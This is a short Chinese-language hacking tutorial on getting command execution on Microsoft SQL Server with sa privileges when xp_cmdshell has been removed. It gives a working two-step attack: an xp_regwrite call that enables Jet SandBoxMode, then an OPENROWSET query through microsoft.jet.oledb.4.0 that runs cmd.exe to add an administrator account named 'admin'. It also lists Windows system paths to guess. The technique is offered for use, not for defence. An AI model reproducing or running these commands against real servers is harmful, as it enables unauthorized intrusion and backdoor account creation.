SA权限仅需xp_regwrite即可有dos

SA权限仅需xp_regwrite即可有dos shell
删除xp_cmdshell和xplog70.dll不用担心，只要保留xp_regwrite就能够执行系统命令，拥有一个dos shell
利用RDS的一个老问题，在IIS 4.0的时候被广泛利用，现在似乎没多少人想得起来了
绝对比去想办法恢复xp_cmdshell来得经济实惠，但是需要猜一下系统路径
nt/2k: x:/winnt/system32/
xp/2003: x:/windows/system32/
假如有回显，能够看到执行返回结果，否则需要先判断主机OS类型再试
当然假如野蛮一点，四个轮流来一遍也行。

首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE''SOFTWARE/Microsoft/Jet/4.0/Engines''SandBoxMode''REG_DWORD'1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0'';database=c:/winnt/system32/ias/ias.mdb''select shell("cmd.exe /c net user admin admin1234 /add")')